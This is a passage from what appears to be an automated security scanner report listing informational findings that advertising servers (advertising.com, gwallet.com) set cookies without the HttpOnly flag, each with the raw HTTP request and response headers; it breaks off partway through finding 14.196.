GET /site=793631/size=160600/u=2/bnum=63830787/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1061515.793631.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:11:39 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 697
Date: Mon, 03 Oct 2011 00:11:38 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:11:39 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- PubMatic ad tag (Javascript) : Travelocity_160X600_ATF | http:\/\/www.Travelocity.com | 160 x 600 Wide Skyscraper | Advertising.Com Fixed 3\/24 -->\r\n<script type="text\/javasc
...[SNIP]...

14.189. http://r1-ads.ace.advertising.com/site=793631/size=160600/u=2/bnum=74948035/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=793631/size=160600/u=2/bnum=74948035/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the response's Set-Cookie headers below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=793631/size=160600/u=2/bnum=74948035/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1061515.793631.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:06 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 697
Date: Mon, 03 Oct 2011 00:09:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:06 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- PubMatic ad tag (Javascript) : Travelocity_160X600_ATF | http:\/\/www.Travelocity.com | 160 x 600 Wide Skyscraper | Advertising.Com Fixed 3\/24 -->\r\n<script type="text\/javasc
...[SNIP]...

14.190. http://r1-ads.ace.advertising.com/site=793633/size=728090/u=2/bnum=55878431/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=793633/size=728090/u=2/bnum=55878431/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the response's Set-Cookie headers below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=793633/size=728090/u=2/bnum=55878431/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1061516.793633.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:06 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 690
Date: Mon, 03 Oct 2011 00:09:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:06 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- PubMatic ad tag (Javascript) : Travelocity_728X90_ATF | http:\/\/www.Travelocity.com | 728 x 90 Leaderboard | Advertising.Com Fixed 3\/24 -->\r\n<script type="text\/javascript">
...[SNIP]...

14.191. http://r1-ads.ace.advertising.com/site=797434/size=300250/u=2/bnum=24812117/hr=20/hl=8/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.igougo.com%252Fabout%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=797434/size=300250/u=2/bnum=24812117/hr=20/hl=8/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.igougo.com%252Fabout%252F

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the response's Set-Cookie headers below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=797434/size=300250/u=2/bnum=24812117/hr=20/hl=8/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.igougo.com%252Fabout%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.971432.797434.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 01:53:07 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 687
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 01:53:07 GMT
Connection: close
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 01:53:07 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- PubMatic ad tag (Javascript) : igougo_300X250_ATF | http:\/\/www.igougo.com | 300 x 250 Medium Rectangle | Advertising.com - Indirect -->\r\n<script type="text\/javascript">\r\n
...[SNIP]...

14.192. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the response's Set-Cookie headers below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1072156.812162.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:16 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 603
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:12:15 GMT
Connection: close
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:12:16 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000812162/mn
...[SNIP]...

14.193. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the response's Set-Cookie headers below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1072156.812162.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 603
Date: Mon, 03 Oct 2011 00:09:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:08 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000812162/mn
...[SNIP]...

14.194. http://r1-ads.ace.advertising.com/site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the response's Set-Cookie headers below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.915323.812164.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:08 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 595
Date: Mon, 03 Oct 2011 00:09:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Sun, 03-Oct-2021 00:09:08 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3285.advertisingcom/B2343920.49;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000812164/mnum=0000
...[SNIP]...

14.195. http://rs.gwallet.com/r1/pixel/x1743

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x1743

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the response's Set-Cookie headers below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x1743 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=; ra1_oo=1; ra1_uid=4711648038188259648

Response

HTTP/1.1 200 OK
Content-Length: 140
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Mon, 01-Oct-2012 23:49:40 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=DDX1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Sun, 02-Oct-2016 23:49:40 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://bh.contextweb.com/bh/set.aspx?action=clr&advid=3420&token=RORO1" width="1" height="1" border="0"></body></html>

14.196. http://rs.gwallet.com/r1/pixel/x914r7675757

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x914r7675757

Issue detail

